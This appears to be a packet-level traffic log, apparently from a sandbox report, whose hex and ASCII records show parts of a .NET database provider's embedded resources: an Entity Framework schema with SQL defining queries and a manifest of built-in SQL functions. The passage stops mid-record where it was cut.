2023-11-18 09:02:37 UTC	667	IN	Data Raw: 65 00 73 00 00 0f 62 00 69 00 6e 00 64 00 69 00 6e 00 67 00 00 1d 65 00 78 00 70 00 72 00 65 00 73 00 73 00 69 00 6f 00 6e 00 4c 00 69 00 73 00 74 00 00 11 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 00 09 62 00 6f 00 64 00 79 00 00 81 5d 55 00 6e 00 61 00 62 00 6c 00 65 00 20 00 74 00 6f 00 20 00 75 00 70 00 64 00 61 00 74 00 65 00 20 00 74 00 68 00 65 00 20 00 45 00 6e 00 74 00 69 00 74 00 79 00 53 00 65 00 74 00 20 00 27 00 7b 00 30 00 7d 00 27 00 20 00 62 00 65 00 63 00 61 00 75 00 73 00 65 00 20 00 69 00 74 00 20 00 68 00 61 00 73 00 20 00 61 00 20 00 44 00 65 00 66 00 69 00 6e 00 69 00 6e 00 67 00 51 00 75 00 65 00 72 00 79 00 20 00 61 00 6e 00 64 00 20 00 6e 00 6f 00 20 00 3c 00 7b 00 31 00 7d 00 3e 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 Data Ascii: esbindingexpressionListfunctionbody]Unable to update the EntitySet '{0}' because it has a DefiningQuery and no <{1}> elemen
2023-11-18 09:02:37 UTC	671	IN	Data Raw: 1d 0e 12 82 4d 08 12 82 4d 12 82 51 08 20 02 12 82 4d 0e 1d 0e 05 20 00 12 83 41 06 20 01 12 82 4d 0e 05 20 00 12 82 51 23 07 0d 12 59 12 82 61 12 82 51 12 82 4d 0e 11 82 65 12 81 8d 12 82 69 11 80 9d 0e 12 81 89 12 82 6d 1d 1c 04 20 01 0e 0e 09 20 03 12 59 12 82 bd 0e 1c 05 20 00 11 82 65 05 20 00 12 83 49 08 00 01 11 80 9d 12 81 75 0c 00 03 0e 12 82 49 11 80 9d 11 82 65 0b 20 05 12 59 12 82 bd 0e 1c 1c 1c 06 20 01 01 12 82 51 06 20 01 01 12 82 6d 06 20 01 08 12 82 4d 04 20 00 1d 1c 07 20 01 12 83 4d 1d 1c 05 20 00 12 83 29 07 20 02 01 0e 12 83 29 07 20 02 0e 0e 12 82 7d 04 07 02 09 08 05 07 01 11 80 9d 05 07 01 12 80 95 0f 07 03 15 12 5d 01 12 80 b5 12 80 b5 12 80 b5 08 15 12 81 71 01 12 80 b5 07 15 12 5d 01 12 80 b5 0c 07 02 15 12 5d 01 12 81 15 12 81 Data Ascii: MMQ M A M Q#YaQMeim Y e IuIe Y Q m M M ) ) }]q]]
2023-11-18 09:02:37 UTC	675	IN	Data Raw: 67 65 74 5f 41 6c 6c 56 61 6c 75 65 73 3e 64 5f 5f 31 31 00 00 04 01 00 00 00 40 01 00 33 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 54 6f 6f 6c 73 2e 53 74 72 6f 6e 67 6c 79 54 79 70 65 64 52 65 73 6f 75 72 63 65 42 75 69 6c 64 65 72 07 34 2e 30 2e 30 2e 30 00 00 e8 07 00 00 ce ca ef be 01 00 00 00 91 00 00 00 6c 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 52 65 73 6f 75 72 63 65 52 65 61 64 65 72 2c 20 6d 73 63 6f 72 6c 69 62 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39 23 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 52 75 6e 74 69 6d 65 52 65 73 6f 75 72 63 65 53 65 74 02 00 00 Data Ascii: get_AllValues>d__11@3System.Resources.Tools.StronglyTypedResourceBuilder4.0.0.0lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
2023-11-18 09:02:37 UTC	679	IN	Data Raw: 20 20 20 20 20 20 5b 56 69 65 77 44 65 66 69 6e 69 74 69 6f 6e 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 49 53 5f 55 50 44 41 54 41 42 4c 45 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 49 73 55 70 64 61 74 61 62 6c 65 5d 0a 20 20 20 20 20 20 20 20 46 52 4f 4d 0a 20 20 20 20 20 20 20 20 54 45 4d 50 2e 53 43 48 45 4d 41 56 49 45 57 53 0a 20 20 20 20 20 20 3c 2f 44 65 66 69 6e 69 6e 67 51 75 65 72 79 3e 0a 20 20 20 20 3c 2f 45 6e 74 69 74 79 53 65 74 3e 0a 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 53 56 69 65 77 43 6f 6c 75 6d 6e 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 56 69 65 77 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 3c 44 65 66 69 6e 69 6e 67 51 75 65 72 79 3e 0a 20 20 20 20 20 20 20 20 53 45 4c 45 43 54 Data Ascii: [ViewDefinition] , IS_UPDATABLE [IsUpdatable] FROM TEMP.SCHEMAVIEWS </DefiningQuery> </EntitySet> <EntitySet Name="SViewColumns" EntityType="Self.ViewColumn"> <DefiningQuery> SELECT
2023-11-18 09:02:37 UTC	683	IN	Data Raw: 54 49 41 4c 4c 59 5f 44 45 46 45 52 52 45 44 20 5b 49 73 49 6e 69 74 69 61 6c 6c 79 44 65 66 65 72 72 65 64 5d 0a 20 20 20 20 20 20 20 20 46 52 4f 4d 0a 20 20 20 20 20 20 20 20 54 45 4d 50 2e 53 43 48 45 4d 41 43 4f 4e 53 54 52 41 49 4e 54 53 20 74 63 0a 20 20 20 20 20 20 3c 2f 44 65 66 69 6e 69 6e 67 51 75 65 72 79 3e 0a 20 20 20 20 3c 2f 45 6e 74 69 74 79 53 65 74 3e 0a 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 53 43 68 65 63 6b 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 43 68 65 63 6b 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 20 20 3c 44 65 66 69 6e 69 6e 67 51 75 65 72 79 3e 0a 20 20 20 20 20 20 20 20 53 45 4c 45 43 54 0a 20 20 20 20 20 20 20 20 4e 55 4c 4c 20 5b 49 64 5d Data Ascii: TIALLY_DEFERRED [IsInitiallyDeferred] FROM TEMP.SCHEMACONSTRAINTS tc </DefiningQuery> </EntitySet> <EntitySet Name="SCheckConstraints" EntityType="Self.CheckConstraint"> <DefiningQuery> SELECT NULL [Id]
2023-11-18 09:02:37 UTC	687	IN	Data Raw: 53 65 74 3e 0a 20 20 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 20 4e 61 6d 65 3d 22 53 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 41 73 73 6f 63 69 61 74 69 6f 6e 3d 22 53 65 6c 66 2e 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 22 20 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 50 61 72 65 6e 74 22 20 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 73 22 2f 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 20 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 2f 3e 0a 20 20 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 3e 0a 20 20 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 20 4e 61 6d 65 3d 22 53 56 69 65 77 43 6f 6e Data Ascii: Set> <AssociationSet Name="SViewViewConstraints" Association="Self.ViewViewConstraint" > <End Role="Parent" EntitySet="SViews"/> <End Role="Constraint" EntitySet="SViewConstraints"/> </AssociationSet> <AssociationSet Name="SViewCon
2023-11-18 09:02:37 UTC	691	IN	Data Raw: 68 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 53 63 61 6c 65 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 6c 61 74 69 6f 6e 43 61 74 61 6c 6f 67 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 6c 61 74 69 6f 6e 53 63 68 65 6d 61 22 20 54 79 70 65 3d Data Ascii: h" Type="int" /> <Property Name="Precision" Type="int" /> <Property Name="DateTimePrecision" Type="int" /> <Property Name="Scale" Type="int" /> <Property Name="CollationCatalog" Type="nvarchar" /> <Property Name="CollationSchema" Type=
2023-11-18 09:02:37 UTC	695	IN	Data Raw: 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 45 78 70 72 65 73 73 69 6f 6e 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 74 72 75 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 3c 2f 45 6e 74 69 74 79 54 79 70 65 3e 0a 0a 20 20 3c 45 6e 74 69 74 79 54 79 70 65 20 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 3c 4b 65 79 3e 0a 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 Data Ascii: Property Name="Id" Nullable="false" Type="nvarchar" /> <Property Name="Expression" Nullable="true" Type="nvarchar" /> </EntityType> <EntityType Name="ConstraintColumn"> <Key> <PropertyRef Name="ConstraintId" /> <PropertyRef Name="
2023-11-18 09:02:37 UTC	698	IN	Data Raw: 31 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 22 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 2a 22 20 2f 3e 0a 20 20 20 20 3c 52 65 66 65 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 6e 74 3e 0a 20 20 20 20 20 20 3c 50 72 69 6e 63 69 70 61 6c 20 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 50 72 69 6e 63 69 70 61 6c 3e 0a 20 20 20 20 20 20 3c 44 65 70 65 6e 64 65 6e 74 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d Data Ascii: 1" /> <End Type="Self.ForeignKey" Role="ForeignKey" Multiplicity="*" /> <ReferentialConstraint> <Principal Role="Constraint"> <PropertyRef Name="Id" /> </Principal> <Dependent Role="ForeignKey"> <PropertyRef Name=
2023-11-18 09:02:37 UTC	702	IN	Data Raw: 3e 0a 20 20 20 20 20 20 3c 2f 44 65 70 65 6e 64 65 6e 74 3e 0a 20 20 20 20 3c 2f 52 65 66 65 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 6e 74 3e 0a 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 3e 0a 0a 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 20 4e 61 6d 65 3d 22 46 72 6f 6d 46 6f 72 65 69 67 6e 4b 65 79 56 69 65 77 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 56 69 65 77 43 6f 6c 75 6d 6e 22 20 52 6f 6c 65 3d 22 43 6f 6c 75 6d 6e 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 31 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 22 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 2a 22 20 2f 3e 0a 20 20 20 Data Ascii: > </Dependent> </ReferentialConstraint> </Association> <Association Name="FromForeignKeyViewColumn"> <End Type="Self.ViewColumn" Role="Column" Multiplicity="1" /> <End Type="Self.ForeignKey" Role="ForeignKey" Multiplicity="*" />
2023-11-18 09:02:37 UTC	706	IN	Data Raw: 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 20 45 6e 74 69 74 79 53 65 74 3d 22 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 2f 3e 0a 20 20 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 3e 0a 20 20 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 20 4e 61 6d 65 3d 22 46 72 6f 6d 56 69 65 77 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6c 75 6d 6e 73 22 20 41 73 73 6f 63 69 61 74 69 6f 6e 3d 22 53 65 6c 66 2e 46 72 6f 6d 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6c 75 6d 6e 22 20 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 43 6f 6c 75 6d 6e 22 20 45 6e 74 69 74 79 53 65 74 3d 22 56 69 65 77 43 6f 6c 75 6d 6e 73 22 2f 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 20 45 6e Data Ascii: <End Role="Constraint" EntitySet="ViewConstraints"/> </AssociationSet> <AssociationSet Name="FromViewForeignKeyColumns" Association="Self.FromForeignKeyColumn" > <End Role="Column" EntitySet="ViewColumns"/> <End Role="ForeignKey" En
2023-11-18 09:02:37 UTC	710	IN	Data Raw: 20 20 20 3c 2f 4b 65 79 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4f 72 64 69 6e 61 6c 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 61 72 61 6d 65 74 65 72 54 79 70 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 65 6c 66 2e Data Ascii: </Key> <Property Name="Id" Nullable="false" Type="String" /> <Property Name="Name" Nullable="false" Type="String" /> <Property Name="Ordinal" Nullable="false" Type="Int32" /> <Property Name="ParameterType" Nullable="false" Type="Self.
2023-11-18 09:02:37 UTC	714	IN	Data Raw: 41 73 73 6f 63 69 61 74 69 6f 6e 20 4e 61 6d 65 3d 22 52 6f 75 74 69 6e 65 50 61 72 61 6d 65 74 65 72 22 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 52 6f 75 74 69 6e 65 22 20 52 6f 6c 65 3d 22 52 6f 75 74 69 6e 65 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 31 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 50 61 72 61 6d 65 74 65 72 22 20 52 6f 6c 65 3d 22 50 61 72 61 6d 65 74 65 72 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 2a 22 20 2f 3e 0a 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 3e 0a 0a 3c 2f 53 63 68 65 6d 61 3e 68 9b 00 00 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 0a 3c 21 2d 2d 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a Data Ascii: Association Name="RoutineParameter"> <End Type="Self.Routine" Role="Routine" Multiplicity="1" /> <End Type="Self.Parameter" Role="Parameter" Multiplicity="" /> </Association></Schema>h<?xml version="1.0" encoding="utf-8"?>.../********
2023-11-18 09:02:37 UTC	719	IN	Data Raw: 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 43 6f 6c 6c 65 63 74 69 6f 6e 28 44 6f 75 62 6c 65 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 4f 55 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 4f 55 4e 54 22 20 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 Data Ascii: Aggregate="true" BuiltIn="true"> <ReturnType Type="Double" /> <Parameter Name="arg" Type="Collection(Double)" Mode="In" /> </Function> ... COUNT --> <Function Name="COUNT" Aggregate="true" BuiltIn="true"> <ReturnType Type="
2023-11-18 09:02:37 UTC	723	IN	Data Raw: 43 6f 6c 6c 65 63 74 69 6f 6e 28 49 6e 74 31 36 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4d 49 4e 22 20 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 43 6f 6c 6c 65 63 74 69 6f 6e 28 49 6e 74 33 32 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4d 49 4e 22 20 41 67 67 72 65 67 61 74 Data Ascii: Collection(Int16)" Mode="In" /> </Function> <Function Name="MIN" Aggregate="true" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="arg" Type="Collection(Int32)" Mode="In" /> </Function> <Function Name="MIN" Aggregat
2023-11-18 09:02:37 UTC	727	IN	Data Raw: 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 53 65 61 72 63 68 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 54 61 72 67 65 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 48 41 52 49 4e 44 45 58 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 53 65 61 72 63 68 22 20 54 79 Data Ascii: <Parameter Name="strSearch" Type="String" Mode="In" /> <Parameter Name="strTarget" Type="String" Mode="In" /> </Function> <Function Name="CHARINDEX" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="strSearch" Ty
2023-11-18 09:02:37 UTC	730	IN	Data Raw: 76 61 72 63 68 61 72 0a 20 20 20 20 20 20 20 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4c 54 52 49 4d 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4c 54 52 49 4d 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 Data Ascii: varchar --> <Function Name="LTRIM" BuiltIn="true"> <ReturnType Type="String" /> <Parameter Name="str" Type="String" Mode="In" /> </Function> <Function Name="LTRIM" BuiltIn="true"> <ReturnType Type="String" /> <P
2023-11-18 09:02:37 UTC	734	IN	Data Raw: 20 54 79 70 65 3d 22 42 69 6e 61 72 79 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 61 72 74 22 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6c 65 6e 67 74 68 22 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 53 55 42 53 54 52 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 Data Ascii: Type="Binary" Mode="In" /> <Parameter Name="start" Type="Int64" Mode="In" /> <Parameter Name="length" Type="Int64" Mode="In" /> </Function> <Function Name="SUBSTR" BuiltIn="true"> <ReturnType Type="String" /> <Parameter Na
2023-11-18 09:02:37 UTC	738	IN	Data Raw: 4e 61 6d 65 3d 22 44 41 54 45 44 49 46 46 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 70 61 72 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 61 72 74 64 61 74 65 22 20 54 79 70 65 3d 22 54 69 6d 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 65 6e 64 64 61 74 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 Data Ascii: Name="DATEDIFF" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="datepart" Type="String" Mode="In" /> <Parameter Name="startdate" Type="Time" Mode="In" /> <Parameter Name="enddate" Type="String" Mode="In" /> </Funct
2023-11-18 09:02:37 UTC	742	IN	Data Raw: 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 44 41 59 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 47 45 54 44 41 54 45 28 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 73 3a 20 64 61 74 65 74 69 6d 65 20 20 20 0a 20 20 20 20 20 20 20 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 47 45 54 44 41 54 45 22 Data Ascii: </Function> <Function Name="DAY" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="date" Type="String" Mode="In" /> </Function> ... GETDATE() returns: datetime --> <Function Name="GETDATE"
2023-11-18 09:02:37 UTC	746	IN	Data Raw: 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 44 45 47 52 45 45 53 28 20 61 72 67 20 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 67 3a 20 74 69 6e 79 69 6e 74 2c 20 73 6d 61 6c 6c 69 6e 74 2c 20 69 6e 74 2c 20 62 69 67 69 6e 74 2c 20 6e 75 6d 65 72 69 63 2c 20 64 65 63 69 6d 61 6c 2c 20 73 6d 61 6c 6c 6d 6f 6e 65 79 2c 20 6d 6f 6e 65 79 2c 20 72 65 61 6c 2c 20 66 6c 6f 61 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 73 3a 20 74 69 6e Data Ascii: <ReturnType Type="Double" /> <Parameter 